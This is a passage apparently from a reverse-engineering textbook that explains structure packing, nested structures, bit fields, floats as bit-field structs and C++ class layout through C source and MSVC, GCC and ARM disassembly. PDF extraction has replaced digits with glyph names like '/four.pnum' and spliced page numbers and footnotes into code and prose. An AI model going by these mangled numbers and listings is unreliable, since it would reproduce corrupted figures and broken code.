BLX _localtime_r
LDR R1, [SP,#0x38+var_34.tm_year]
MOV R0, 0xF44 ; "Year: %d\n"
ADD R0, PC ; char *
ADDW R1, R1, #0x76C
BLX _printf
LDR R1, [SP,#0x38+var_34.tm_mon]
MOV R0, 0xF3A ; "Month: %d\n"
ADD R0, PC ; char *
BLX _printf
LDR R1, [SP,#0x38+var_34.tm_mday]
MOV R0, 0xF35 ; "Day: %d\n"
ADD R0, PC ; char *
BLX _printf
LDR R1, [SP,#0x38+var_34.tm_hour]
MOV R0, 0xF2E ; "Hour: %d\n"
ADD R0, PC ; char *
BLX _printf
LDR R1, [SP,#0x38+var_34.tm_min]
MOV R0, 0xF28 ; "Minutes: %d\n"
ADD R0, PC ; char *
BLX _printf
LDR R1, [SP,#0x38+var_34]
MOV R0, 0xF25 ; "Seconds: %d\n"
ADD R0, PC ; char *
BLX _printf
ADD SP, SP, #0x30
POP {R7,PC}
...
00000000 tm struc ; (sizeof=0x2C, standard type)
00000000 tm_sec DCD ?
00000004 tm_min DCD ?
00000008 tm_hour DCD ?
0000000C tm_mday DCD ?
00000010 tm_mon DCD ?
00000014 tm_year DCD ?
00000018 tm_wday DCD ?
0000001C tm_yday DCD ?
00000020 tm_isdst DCD ?
00000024 tm_gmtoff DCD ?
00000028 tm_zone DCD ? ; offset
0000002C tm ends
/one.pnum/zero.pnum/three.pnum
/one.pnum./one.pnum/six.pnum./four.pnum Fields packing in structure
One important thing is fields packing in structures/nine.pnum/three.pnum.
Let’s take a simple example:
#include <stdio.h>
struct s
{
char a;
int b;
char c;
int d;
};
void f(struct s s)
{
printf ("a=%d; b=%d; c=%d; d=%d\n", s.a, s.b, s.c, s.d);
};
As we see, we have two char fields (each is exactly one byte) and two more — int(each - /four.pnum bytes).
x/eight.pnum/six.pnum
That’s all compiling into:
_s$ = 8 ; size = 16
?f@@YAXUs@@@Z PROC ; f
push ebp
mov ebp, esp
mov eax, DWORD PTR _s$[ebp+12]
push eax
movsx ecx, BYTE PTR _s$[ebp+8]
push ecx
mov edx, DWORD PTR _s$[ebp+4]
push edx
movsx eax, BYTE PTR _s$[ebp]
push eax
push OFFSET $SG3842
call _printf
add esp, 20 ; 00000014H
pop ebp
ret 0
?f@@YAXUs@@@Z ENDP ; f
_TEXT ENDS
As we can see, each field’s address is aligned by /four.pnum-bytes border. That’s why each char using /four.pnum bytes here, like
int. Why? Thus it’s easier for CPU to access memory at aligned addresses and to cache data from it.
However, it’s not very economical in size sense.
Let’s try to compile it with option ( /Zp1 ) (/Zp[n] pack structs on n-byte boundary ).
Listing /one.pnum./eight.pnum/seven.pnum: MSVC /Zp/one.pnum
_TEXT SEGMENT
_s$ = 8 ; size = 10
?f@@YAXUs@@@Z PROC ; f
push ebp
mov ebp, esp
mov eax, DWORD PTR _s$[ebp+6]
push eax
movsx ecx, BYTE PTR _s$[ebp+5]
push ecx
mov edx, DWORD PTR _s$[ebp+1]
push edx
/nine.pnum/three.pnumSee also: Wikipedia: Data structure alignment
/one.pnum/zero.pnum/four.pnum
movsx eax, BYTE PTR _s$[ebp]
push eax
push OFFSET $SG3842
call _printf
add esp, 20 ; 00000014H
pop ebp
ret 0
?f@@YAXUs@@@Z ENDP ; f
Now the structure takes only /one.pnum/zero.pnum bytes and each char value takes /one.pnum byte. What it give to us? Size economy. And
as drawback — CPU will access these fields without maximal performance it can.
As it can be easily guessed, if the structure is used in many source and object files, all these should be compiled
with the same convention about structures packing.
Aside from MSVC /Zpoption which set how to align each structure field, here is also #pragma pack compiler
option, it can be defined right in source code. It’s available in both MSVC/nine.pnum/four.pnumand GCC/nine.pnum/five.pnum.
Let’s back to SYSTEMTIME structure consisting in /one.pnum/six.pnum-bit fields. How our compiler know to pack them on /one.pnum-byte
alignment method?
WinNT.h file has this:
Listing /one.pnum./eight.pnum/eight.pnum: WinNT.h
#include "pshpack1.h"
And this:
Listing /one.pnum./eight.pnum/nine.pnum: WinNT.h
#include "pshpack4.h" // 4 byte packing is the default
The file PshPack/one.pnum.h looks like:
Listing /one.pnum./nine.pnum/zero.pnum: PshPack/one.pnum.h
#if ! (defined(lint) || defined(RC_INVOKED))
#if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED)
#pragma warning(disable:4103)
#if !(defined( MIDL_PASS )) || defined( __midl )
#pragma pack(push,1)
#else
#pragma pack(1)
#endif
#else
#pragma pack(1)
#endif
#endif /* ! (defined(lint) || defined(RC_INVOKED)) */
That’s how compiler will pack structures defined a/f_ter #pragma pack .
ARM + Optimizing Keil + thumb mode
Listing /one.pnum./nine.pnum/one.pnum: Optimizing Keil + thumb mode
.text:0000003E exit ; CODE XREF: f+16
.text:0000003E 05 B0 ADD SP, SP, #0x14
.text:00000040 00 BD POP {PC}
.text:00000280 f
.text:00000280
.text:00000280 var_18 = -0x18
.text:00000280 a = -0x14
.text:00000280 b = -0x10
/nine.pnum/four.pnumMSDN: Working with Packing Structures
/nine.pnum/five.pnumStructure-Packing Pragmas
/one.pnum/zero.pnum/five.pnum
.text:00000280 c = -0xC
.text:00000280 d = -8
.text:00000280
.text:00000280 0F B5 PUSH {R0-R3,LR}
.text:00000282 81 B0 SUB SP, SP, #4
.text:00000284 04 98 LDR R0, [SP,#16] ; d
.text:00000286 02 9A LDR R2, [SP,#8] ; b
.text:00000288 00 90 STR R0, [SP]
.text:0000028A 68 46 MOV R0, SP
.text:0000028C 03 7B LDRB R3, [R0,#12] ; c
.text:0000028E 01 79 LDRB R1, [R0,#4] ; a
.text:00000290 59 A0 ADR R0, aADBDCDDD ; "a=%d; b=%d; c=%d; d=%d\n"
.text:00000292 05 F0 AD FF BL __2printf
.text:00000296 D2 E6 B exit
As we may recall, here a structure passed instead of pointer to structure, and because first /four.pnum function argu-
ments in ARM are passed via registers, so then structure fields are passed via R0-R3 .
LDRB loads one byte from memory and extending it to /three.pnum/two.pnum-bit, taking into account its sign. This is similar to
MOVSX /one.pnum./one.pnum/one.pnum./one.pnum instruction in x/eight.pnum/six.pnum. Here it’s used for loading fields aandcfrom structure.
One more thing we spot easily, instead of function epilogue, here is jump to another function’s epilogue! In-
deed, that was another function, not related in any way to our function, however, it has exactly the same epilogue
(probably because, it hold /five.pnum local variables too ( 5*4 = 0 x14)). Also, it’s located nearly (take a look on addresses).
Indeed, there are no difference, which epilogue to execute, if it works just as we need. Apparently, Keil decides to
do this because of economy. Epilogue takes /four.pnum bytes while jump — only /two.pnum.
ARM + Optimizing Xcode (LLVM) + thumb-/two.pnum mode
Listing /one.pnum./nine.pnum/two.pnum: Optimizing Xcode (LLVM) + thumb-/two.pnum mode
var_C = -0xC
PUSH {R7,LR}
MOV R7, SP
SUB SP, SP, #4
MOV R9, R1 ; b
MOV R1, R0 ; a
MOVW R0, #0xF10 ; "a=%d; b=%d; c=%d; d=%d\n"
SXTB R1, R1 ; prepare a
MOVT.W R0, #0
STR R3, [SP,#0xC+var_C] ; place d to stack for printf()
ADD R0, PC ; format-string
SXTB R3, R2 ; prepare c
MOV R2, R9 ; b
BLX _printf
ADD SP, SP, #4
POP {R7,PC}
SXTB (Signed Extend Byte ) is analogous to MOVSX /one.pnum./one.pnum/one.pnum./one.pnum in x/eight.pnum/six.pnum as well, but works not with memory, but with
register. All the rest — just the same.
/one.pnum./one.pnum/six.pnum./five.pnum Nested structures
Now what about situations when one structure define another structure inside?
#include <stdio.h>
struct inner_struct
{
int a;
int b;
};
struct outer_struct
/one.pnum/zero.pnum/six.pnum
{
char a;
int b;
struct inner_struct c;
char d;
int e;
};
void f(struct outer_struct s)
{
printf ("a=%d; b=%d; c.a=%d; c.b=%d; d=%d; e=%d\n",
s.a, s.b, s.c.a, s.c.b, s.d, s.e);
};
...in this case, both inner_struct fields will be placed between a,b and d,e fields of outer_struct .
Let’s compile (MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum):
Listing /one.pnum./nine.pnum/three.pnum: MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum
_s$ = 8 ; size = 24
_f PROC
push ebp
mov ebp, esp
mov eax, DWORD PTR _s$[ebp+20] ; e
push eax
movsx ecx, BYTE PTR _s$[ebp+16] ; d
push ecx
mov edx, DWORD PTR _s$[ebp+12] ; c.b
push edx
mov eax, DWORD PTR _s$[ebp+8] ; c.a
push eax
mov ecx, DWORD PTR _s$[ebp+4] ; b
push ecx
movsx edx, BYTE PTR _s$[ebp] ;a
push edx
push OFFSET $SG2466
call _printf
add esp, 28 ; 0000001cH
pop ebp
ret 0
_f ENDP
One curious point here is that by looking onto this assembly code, we do not even see that another structure
was used inside of it! Thus, we would say, nested structures are finally unfolds into linear orone-dimensional
structure.
Of course, if to replace struct inner_struct c; declaration to struct inner_struct *c; (thus making a
pointer here) situation will be significally different.
/one.pnum./one.pnum/six.pnum./six.pnum Bit fields in structure
CPUID example
C/C++ language allow to define exact number of bits for each structure fields. It’s very useful if one need to save
memory space. For example, one bit is enough for variable of bool type. But of course, it’s not rational if speed is
important.
Let’s consider CPUID/nine.pnum/six.pnuminstruction example. This instruction return information about current CPU and its fea-
tures.
IfEAXis set to /one.pnum before instruction execution, CPUID will return this information packed into EAXregister:
/nine.pnum/six.pnumhttp://en.wikipedia.org/wiki/CPUID
/one.pnum/zero.pnum/seven.pnum
/three.pnum:/zero.pnum Stepping
/seven.pnum:/four.pnum Model
/one.pnum/one.pnum:/eight.pnum Family
/one.pnum/three.pnum:/one.pnum/two.pnum Processor Type
/one.pnum/nine.pnum:/one.pnum/six.pnum Extended Model
/two.pnum/seven.pnum:/two.pnum/zero.pnum Extended Family
MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum has CPUID macro, but GCC /four.pnum./four.pnum./one.pnum — hasn’t. So let’s make this function by yourself for GCC, using its
built-in assembler/nine.pnum/seven.pnum.
#include <stdio.h>
#ifdef __GNUC__
static inline void cpuid(int code, int *a, int *b, int *c, int *d) {
asm volatile("cpuid":"=a"(*a),"=b"(*b),"=c"(*c),"=d"(*d):"a"(code));
}
#endif
#ifdef _MSC_VER
#include <intrin.h>
#endif
struct CPUID_1_EAX
{
unsigned int stepping:4;
unsigned int model:4;
unsigned int family_id:4;
unsigned int processor_type:2;
unsigned int reserved1:2;
unsigned int extended_model_id:4;
unsigned int extended_family_id:8;
unsigned int reserved2:4;
};
int main()
{
struct CPUID_1_EAX *tmp;
int b[4];
#ifdef _MSC_VER
__cpuid(b,1);
#endif
#ifdef __GNUC__
cpuid (1, &b[0], &b[1], &b[2], &b[3]);
#endif
tmp=(struct CPUID_1_EAX *)&b[0];
printf ("stepping=%d\n", tmp->stepping);
printf ("model=%d\n", tmp->model);
printf ("family_id=%d\n", tmp->family_id);
printf ("processor_type=%d\n", tmp->processor_type);
printf ("extended_model_id=%d\n", tmp->extended_model_id);
printf ("extended_family_id=%d\n", tmp->extended_family_id);
return 0;
};
A/f_terCPUID will fillEAX/EBX/ECX/EDX, these registers will be reflected in b[]array. Then, we have a pointer to
CPUID_1_EAX structure and we point it to EAXvalue from b[]array.
In other words, we treat /three.pnum/two.pnum-bit intvalue as a structure.
Then we read from the stucture.
/nine.pnum/seven.pnumMore about internal GCC assembler
/one.pnum/zero.pnum/eight.pnum
Let’s compile it in MSVC /two.pnum/zero.pnum/zero.pnum/eight.pnum with /Oxoption:
Listing /one.pnum./nine.pnum/four.pnum: Optimizing MSVC /two.pnum/zero.pnum/zero.pnum/eight.pnum
_b$ = -16 ; size = 16
_main PROC
sub esp, 16 ; 00000010H
push ebx
xor ecx, ecx
mov eax, 1
cpuid
push esi
lea esi, DWORD PTR _b$[esp+24]
mov DWORD PTR [esi], eax
mov DWORD PTR [esi+4], ebx
mov DWORD PTR [esi+8], ecx
mov DWORD PTR [esi+12], edx
mov esi, DWORD PTR _b$[esp+24]
mov eax, esi
and eax, 15 ; 0000000fH
push eax
push OFFSET $SG15435 ; ’stepping=%d’, 0aH, 00H
call _printf
mov ecx, esi
shr ecx, 4
and ecx, 15 ; 0000000fH
push ecx
push OFFSET $SG15436 ; ’model=%d’, 0aH, 00H
call _printf
mov edx, esi
shr edx, 8
and edx, 15 ; 0000000fH
push edx
push OFFSET $SG15437 ; ’family_id=%d’, 0aH, 00H
call _printf
mov eax, esi
shr eax, 12 ; 0000000cH
and eax, 3
push eax
push OFFSET $SG15438 ; ’processor_type=%d’, 0aH, 00H
call _printf
mov ecx, esi
shr ecx, 16 ; 00000010H
and ecx, 15 ; 0000000fH
push ecx
push OFFSET $SG15439 ; ’extended_model_id=%d’, 0aH, 00H
call _printf
shr esi, 20 ; 00000014H
and esi, 255 ; 000000ffH
push esi
push OFFSET $SG15440 ; ’extended_family_id=%d’, 0aH, 00H
call _printf
add esp, 48 ; 00000030H
pop esi
xor eax, eax
pop ebx
add esp, 16 ; 00000010H
ret 0
/one.pnum/zero.pnum/nine.pnum
_main ENDP
SHRinstruction shi/f_ting value in EAXby number of bits should be skipped , e.g., we ignore some bits at right .
ANDinstruction clearing not needed bits at le/f_t , or, in other words, leave only those bits in EAXwe need now.
Let’s try GCC /four.pnum./four.pnum./one.pnum with -O3option.
Listing /one.pnum./nine.pnum/five.pnum: Optimizing GCC /four.pnum./four.pnum./one.pnum
main proc near ; DATA XREF: _start+17
push ebp
mov ebp, esp
and esp, 0FFFFFFF0h
push esi
mov esi, 1
push ebx
mov eax, esi
sub esp, 18h
cpuid
mov esi, eax
and eax, 0Fh
mov [esp+8], eax
mov dword ptr [esp+4], offset aSteppingD ; "stepping=%d\n"
mov dword ptr [esp], 1
call ___printf_chk
mov eax, esi
shr eax, 4
and eax, 0Fh
mov [esp+8], eax
mov dword ptr [esp+4], offset aModelD ; "model=%d\n"
mov dword ptr [esp], 1
call ___printf_chk
mov eax, esi
shr eax, 8
and eax, 0Fh
mov [esp+8], eax
mov dword ptr [esp+4], offset aFamily_idD ; "family_id=%d\n"
mov dword ptr [esp], 1
call ___printf_chk
mov eax, esi
shr eax, 0Ch
and eax, 3
mov [esp+8], eax
mov dword ptr [esp+4], offset aProcessor_type ; "processor_type=%d\n"
mov dword ptr [esp], 1
call ___printf_chk
mov eax, esi
shr eax, 10h
shr esi, 14h
and eax, 0Fh
and esi, 0FFh
mov [esp+8], eax
mov dword ptr [esp+4], offset aExtended_model ; "extended_model_id=%d\n"
mov dword ptr [esp], 1
call ___printf_chk
mov [esp+8], esi
mov dword ptr [esp+4], offset unk_80486D0
mov dword ptr [esp], 1
call ___printf_chk
add esp, 18h
xor eax, eax
pop ebx
pop esi
mov esp, ebp
pop ebp
retn
main endp
/one.pnum/one.pnum/zero.pnum
Almost the same. The only thing to note is that GCC somehow united calculation of extended_model_id
andextended_family_id into one block, instead of calculating them separately, before corresponding each
printf() call.
Working with the float type as with a structure
As it was already noted in section about FPU /one.pnum./one.pnum/three.pnum, both float and double types consisted of sign, significand (or
fraction) and exponent. But will we able to work with these fields directly? Let’s try with float .
Figure /one.pnum./three.pnum: float value format/nine.pnum/eight.pnum
#include <stdio.h>
#include <assert.h>
#include <stdlib.h>
#include <memory.h>
struct float_as_struct
{
unsigned int fraction : 23; // fractional part
unsigned int exponent : 8; // exponent + 0x3FF
unsigned int sign : 1; // sign bit
};
float f(float _in)
{
float f=_in;
struct float_as_struct t;
assert (sizeof (struct float_as_struct) == sizeof (float));
memcpy (&t, &f, sizeof (float));
t.sign=1; // set negative sign
t.exponent=t.exponent+2; // multiple d by 2^n (n here is 2)
memcpy (&f, &t, sizeof (float));
return f;
};
int main()
{
printf ("%f\n", f(1.234));
};
float_as_struct structure occupies as much space is memory as float , e.g., /four.pnum bytes or /three.pnum/two.pnum bits.
Now we setting negative sign in input value and also by addding /two.pnum to exponent we thereby multiplicating the
whole number by 22, e.g., by /four.pnum.
Let’s compile in MSVC /two.pnum/zero.pnum/zero.pnum/eight.pnum without optimization:
Listing /one.pnum./nine.pnum/six.pnum: Non-optimizing MSVC /two.pnum/zero.pnum/zero.pnum/eight.pnum
_t$ = -8 ; size = 4
_f$ = -4 ; size = 4
__in$ = 8 ; size = 4
?f@@YAMM@Z PROC ; f
push ebp
/nine.pnum/eight.pnumillustration taken from wikipedia
/one.pnum/one.pnum/one.pnum
mov ebp, esp
sub esp, 8
fld DWORD PTR __in$[ebp]
fstp DWORD PTR _f$[ebp]
push 4
lea eax, DWORD PTR _f$[ebp]
push eax
lea ecx, DWORD PTR _t$[ebp]
push ecx
call _memcpy
add esp, 12 ; 0000000cH
mov edx, DWORD PTR _t$[ebp]
or edx, -2147483648 ; 80000000H - set minus sign
mov DWORD PTR _t$[ebp], edx
mov eax, DWORD PTR _t$[ebp]
shr eax, 23 ; 00000017H - drop significand
and eax, 255 ; 000000ffH - leave here only exponent
add eax, 2 ; add 2 to it
and eax, 255 ; 000000ffH
shl eax, 23 ; 00000017H - shift result to place of bits 30:23
mov ecx, DWORD PTR _t$[ebp]
and ecx, -2139095041 ; 807fffffH - drop exponent
or ecx, eax ; add original value without exponent with new calculated explonent
mov DWORD PTR _t$[ebp], ecx
push 4
lea edx, DWORD PTR _t$[ebp]
push edx
lea eax, DWORD PTR _f$[ebp]
push eax
call _memcpy
add esp, 12 ; 0000000cH
fld DWORD PTR _f$[ebp]
mov esp, ebp
pop ebp
ret 0
?f@@YAMM@Z ENDP ; f
Redundant for a bit. If it compiled with /Oxflag there are no memcpy() call, f variable is used directly. But it’s
easier to understand it all considering unoptimized version.
What GCC /four.pnum./four.pnum./one.pnum with -O3will do?
Listing /one.pnum./nine.pnum/seven.pnum: Optimizing GCC /four.pnum./four.pnum./one.pnum
; f(float)
public _Z1ff
_Z1ff proc near
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 4
mov eax, [ebp+arg_0]
or eax, 80000000h ; set minus sign
mov edx, eax
and eax, 807FFFFFh ; leave only significand and exponent in EAX
shr edx, 23 ; prepare exponent
add edx, 2 ; add 2
movzx edx, dl ; clear all bits except 7:0 in EAX
/one.pnum/one.pnum/two.pnum
shl edx, 23 ; shift new calculated exponent to its place
or eax, edx ; add newe exponent and original value without exponent
mov [ebp+var_4], eax
fld [ebp+var_4]
leave
retn
_Z1ff endp
public main
main proc near
push ebp
mov ebp, esp
and esp, 0FFFFFFF0h
sub esp, 10h
fld ds:dword_8048614 ; -4.936
fstp qword ptr [esp+8]
mov dword ptr [esp+4], offset asc_8048610 ; "%f\n"
mov dword ptr [esp], 1
call ___printf_chk
xor eax, eax
leave
retn
main endp
Thef()function is almost understandable. However, what is interesting, GCC was able to calculate f(1.234)
result during compilation stage despite all this hodge-podge with structure fields and prepared this argument to
printf() as precalculated!
/one.pnum/one.pnum/three.pnum
/one.pnum./one.pnum/seven.pnum C++ classes
/one.pnum./one.pnum/seven.pnum./one.pnum Simple example
I placed a C++ classes description here intentionally a/f_ter structures description, because internally, C++ classes
representation is almost the same as structures representation.
Let’s try an example with two variables, two constructors and one method:
#include <stdio.h>
class c
{
private:
int v1;
int v2;
public:
c() // default ctor
{
v1=667;
v2=999;
};
c(int a, int b) // ctor
{
v1=a;
v2=b;
};
void dump()
{
printf ("%d; %d\n", v1, v2);
};
};
int main()
{
class c c1;
class c c2(5,6);
c1.dump();
c2.dump();
return 0;
};
Here is how main() function looks like translated into assembly language:
_c2$ = -16 ; size = 8
_c1$ = -8 ; size = 8
_main PROC
push ebp
mov ebp, esp
sub esp, 16 ; 00000010H
lea ecx, DWORD PTR _c1$[ebp]
call ??0c@@QAE@XZ ; c::c
push 6
push 5
lea ecx, DWORD PTR _c2$[ebp]
call ??0c@@QAE@HH@Z ; c::c
lea ecx, DWORD PTR _c1$[ebp]
call ?dump@c@@QAEXXZ ; c::dump
lea ecx, DWORD PTR _c2$[ebp]
call ?dump@c@@QAEXXZ ; c::dump
xor eax, eax
mov esp, ebp
pop ebp
/one.pnum/one.pnum/four.pnum
ret 0
_main ENDP
So what’s going on. For each object (instance of class c) /eight.pnum bytes allocated, that’s exactly size of /two.pnum variables
storage.
Forc/one.pnuma default argumentless constructor ??0c@@QAE@XZ is called. For c/two.pnumanother constructor ??0c@@QAE@HH@Z
is called and two numbers are passed as arguments.
A pointer to object ( thisin C++ terminology) is passed in ECXregister. This is called thiscall /two.pnum./five.pnum./four.pnum — a pointer
to object passing method.
MSVC doing it using ECXregister. Needless to say, it’s not a standardized method, other compilers could do it
differently, e.g., via first function argument (like GCC).
Why these functions has so odd names? That’s name mangling/nine.pnum/nine.pnum.
C++ class may contain several methods sharing the same name but having different arguments — that’s poly-
morphism. And of course, different classes may own methods sharing the same name.
Name mangling allows to encode class name + method name + all method argument types in one ASCII-string,
which will be used as internal function name. That’s all because neither linker, nor DLL operation system loader
(mangled names may be among DLL exports as well) knows nothing about C++ or OOP.
dump() function called two times a/f_ter.
Now let’s see constructors’ code:
_this$ = -4 ; size = 4
??0c@@QAE@XZ PROC ; c::c, COMDAT
; _this$ = ecx
push ebp
mov ebp, esp
push ecx
mov DWORD PTR _this$[ebp], ecx
mov eax, DWORD PTR _this$[ebp]
mov DWORD PTR [eax], 667 ; 0000029bH
mov ecx, DWORD PTR _this$[ebp]
mov DWORD PTR [ecx+4], 999 ; 000003e7H
mov eax, DWORD PTR _this$[ebp]
mov esp, ebp
pop ebp
ret 0
??0c@@QAE@XZ ENDP ; c::c
_this$ = -4 ; size = 4
_a$ = 8 ; size = 4
_b$ = 12 ; size = 4
??0c@@QAE@HH@Z PROC ; c::c, COMDAT
; _this$ = ecx
push ebp
mov ebp, esp
push ecx
mov DWORD PTR _this$[ebp], ecx
mov eax, DWORD PTR _this$[ebp]
mov ecx, DWORD PTR _a$[ebp]
mov DWORD PTR [eax], ecx
mov edx, DWORD PTR _this$[ebp]
mov eax, DWORD PTR _b$[ebp]
mov DWORD PTR [edx+4], eax
mov eax, DWORD PTR _this$[ebp]
mov esp, ebp
pop ebp
ret 8
??0c@@QAE@HH@Z ENDP ; c::c
Constructors are just functions, they use pointer to structure in ECX, moving the pointer into own local variable,
however, it’s not necessary.
Nowdump() method:
/nine.pnum/nine.pnumWikipedia: Name mangling
/one.pnum/one.pnum/five.pnum
_this$ = -4 ; size = 4
?dump@c@@QAEXXZ PROC ; c::dump, COMDAT
; _this$ = ecx
push ebp
mov ebp, esp
push ecx
mov DWORD PTR _this$[ebp], ecx
mov eax, DWORD PTR _this$[ebp]
mov ecx, DWORD PTR [eax+4]
push ecx
mov edx, DWORD PTR _this$[ebp]
mov eax, DWORD PTR [edx]
push eax
push OFFSET ??_C@_07NJBDCIEC@?$CFd?$DL?5?$CFd?6?$AA@
call _printf
add esp, 12 ; 0000000cH
mov esp, ebp
pop ebp
ret 0
?dump@c@@QAEXXZ ENDP ; c::dump
Simple enough: dump() taking pointer to the structure containing two int’s inECX, takes two values from it and
passing it into printf() .
The code is much shorter if compiled with optimization ( /Ox):
??0c@@QAE@XZ PROC ; c::c, COMDAT
; _this$ = ecx
mov eax, ecx
mov DWORD PTR [eax], 667 ; 0000029bH
mov DWORD PTR [eax+4], 999 ; 000003e7H
ret 0
??0c@@QAE@XZ ENDP ; c::c
_a$ = 8 ; size = 4
_b$ = 12 ; size = 4
??0c@@QAE@HH@Z PROC ; c::c, COMDAT
; _this$ = ecx
mov edx, DWORD PTR _b$[esp-4]
mov eax, ecx
mov ecx, DWORD PTR _a$[esp-4]
mov DWORD PTR [eax], ecx
mov DWORD PTR [eax+4], edx
ret 8
??0c@@QAE@HH@Z ENDP ; c::c
?dump@c@@QAEXXZ PROC ; c::dump, COMDAT
; _this$ = ecx
mov eax, DWORD PTR [ecx+4]
mov ecx, DWORD PTR [ecx]
push eax
push ecx
push OFFSET ??_C@_07NJBDCIEC@?$CFd?$DL?5?$CFd?6?$AA@
call _printf
add esp, 12 ; 0000000cH
ret 0
?dump@c@@QAEXXZ ENDP ; c::dump
That’s all. One more thing to say is that stack pointer wasn’t corrected with add esp, X a/f_ter constructor
called. Withal, constructor has ret 8 instead of RETat the end.
This is all because here used thiscall /two.pnum./five.pnum./four.pnum calling convention, the method of passing values through the stack,
which is, together with stdcall /two.pnum./five.pnum./two.pnum method, offers to correct stack to callee rather then to caller. ret x instruction
addingXtoESP, then passes control to caller function.
See also section about calling conventions /two.pnum./five.pnum.
/one.pnum/one.pnum/six.pnum
It’s also should be noted that compiler deciding when to call constructor and destructor — but that’s we al-
ready know from C++ language basics.
GCC
It’s almost the same situation in GCC /four.pnum./four.pnum./one.pnum, with few exceptions.
public main
main proc near ; DATA XREF: _start+17
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_8 = dword ptr -8
push ebp
mov ebp, esp
and esp, 0FFFFFFF0h
sub esp, 20h
lea eax, [esp+20h+var_8]
mov [esp+20h+var_20], eax
call _ZN1cC1Ev
mov [esp+20h+var_18], 6
mov [esp+20h+var_1C], 5
lea eax, [esp+20h+var_10]
mov [esp+20h+var_20], eax
call _ZN1cC1Eii
lea eax, [esp+20h+var_8]
mov [esp+20h+var_20], eax
call _ZN1c4dumpEv
lea eax, [esp+20h+var_10]
mov [esp+20h+var_20], eax
call _ZN1c4dumpEv
mov eax, 0
leave
retn
main endp
Here we see another name mangling style, specific to GNU/one.pnum/zero.pnum/zero.pnumstandards. It’s also can be noted that pointer to
object is passed as first function argument — hiddenly from programmer, of course.
First constructor:
public _ZN1cC1Ev ; weak
_ZN1cC1Ev proc near ; CODE XREF: main+10
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov dword ptr [eax], 667
mov eax, [ebp+arg_0]
mov dword ptr [eax+4], 999
pop ebp
retn
_ZN1cC1Ev endp
What it does is just writes two numbers using pointer passed in first (and single) argument.
Second constructor:
public _ZN1cC1Eii
_ZN1cC1Eii proc near
/one.pnum/zero.pnum/zero.pnumOne more document about different compilers name mangling types: http://www.agner.org/optimize/calling_conventions.
pdf
/one.pnum/one.pnum/seven.pnum
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov edx, [ebp+arg_4]
mov [eax], edx
mov eax, [ebp+arg_0]
mov edx, [ebp+arg_8]
mov [eax+4], edx
pop ebp
retn
_ZN1cC1Eii endp
This is a function, analog of which could be looks like:
void ZN1cC1Eii (int *obj, int a, int b)
{
*obj=a;
*(obj+1)=b;
};
...and that’s completely predictable.
Nowdump() function:
public _ZN1c4dumpEv
_ZN1c4dumpEv proc near
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_0]
mov edx, [eax+4]
mov eax, [ebp+arg_0]
mov eax, [eax]
mov [esp+18h+var_10], edx
mov [esp+18h+var_14], eax
mov [esp+18h+var_18], offset aDD ; "%d; %d\n"
call _printf
leave
retn
_ZN1c4dumpEv endp
This function in its internal representation has sole argument, used as pointer to the object ( this).
Thus, if to base our judgment on these simple examples, the difference between MSVC and GCC is style of
function names encoding ( name mangling ) and passing pointer to object (via ECXregister or via first argument).
/one.pnum/one.pnum/eight.pnum
/one.pnum./one.pnum/seven.pnum./two.pnum Class inheritance in C++
It can be said about inherited classes that it’s simple structure we already considered, but extending in inherited
classes.
Let’s take simple example:
#include <stdio.h>
class object
{
public:
int color;
object() { };
object (int color) { this->color=color; };
void print_color() { printf ("color=%d\n", color); };
};
class box : public object
{
private:
int width, height, depth;
public:
box(int color, int width, int height, int depth)
{
this->color=color;
this->width=width;
this->height=height;
this->depth=depth;
};
void dump()
{
printf ("this is box. color=%d, width=%d, height=%d, depth=%d\n", color, width, height, depth);
};
};
class sphere : public object
{
private:
int radius;
public:
sphere(int color, int radius)
{
this->color=color;
this->radius=radius;
};
void dump()
{
printf ("this is sphere. color=%d, radius=%d\n", color, radius);
};
};
int main()
{
box b(1, 10, 20, 30);
sphere s(2, 40);
b.print_color();
s.print_color();
b.dump();
s.dump();
return 0;
};
Let’s investigate generated code of dump() functions/methods and also object::print_color() , let’s see
/one.pnum/one.pnum/nine.pnum
memory layout for structures-objects (as of /three.pnum/two.pnum-bit code).
So,dump() methods for several classes, generated by MSVC /two.pnum/zero.pnum/zero.pnum/eight.pnum with /Oxand/Ob0 options/one.pnum/zero.pnum/one.pnum
Listing /one.pnum./nine.pnum/eight.pnum: Optimizing MSVC /two.pnum/zero.pnum/zero.pnum/eight.pnum /Ob/zero.pnum
??_C@_09GCEDOLPA@color?$DN?$CFd?6?$AA@ DB ’color=%d’, 0aH, 00H ; ‘string’
?print_color@object@@QAEXXZ PROC ; object::print_color, COMDAT
; _this$ = ecx
mov eax, DWORD PTR [ecx]
push eax
; ’color=%d’, 0aH, 00H
push OFFSET ??_C@_09GCEDOLPA@color?$DN?$CFd?6?$AA@
call _printf
add esp, 8
ret 0
?print_color@object@@QAEXXZ ENDP ; object::print_color
Listing /one.pnum./nine.pnum/nine.pnum: Optimizing MSVC /two.pnum/zero.pnum/zero.pnum/eight.pnum /Ob/zero.pnum
?dump@box@@QAEXXZ PROC ; box::dump, COMDAT
; _this$ = ecx
mov eax, DWORD PTR [ecx+12]
mov edx, DWORD PTR [ecx+8]
push eax
mov eax, DWORD PTR [ecx+4]
mov ecx, DWORD PTR [ecx]
push edx
push eax
push ecx
; ’this is box. color=%d, width=%d, height=%d, depth=%d’, 0aH, 00H ; ‘string’
push OFFSET ??_C@_0DG@NCNGAADL@this?5is?5box?4?5color?$DN?$CFd?0?5width?$DN?$CFd?0@
call _printf
add esp, 20 ; 00000014H
ret 0
?dump@box@@QAEXXZ ENDP ; box::dump
Listing /one.pnum./one.pnum/zero.pnum/zero.pnum: Optimizing MSVC /two.pnum/zero.pnum/zero.pnum/eight.pnum /Ob/zero.pnum
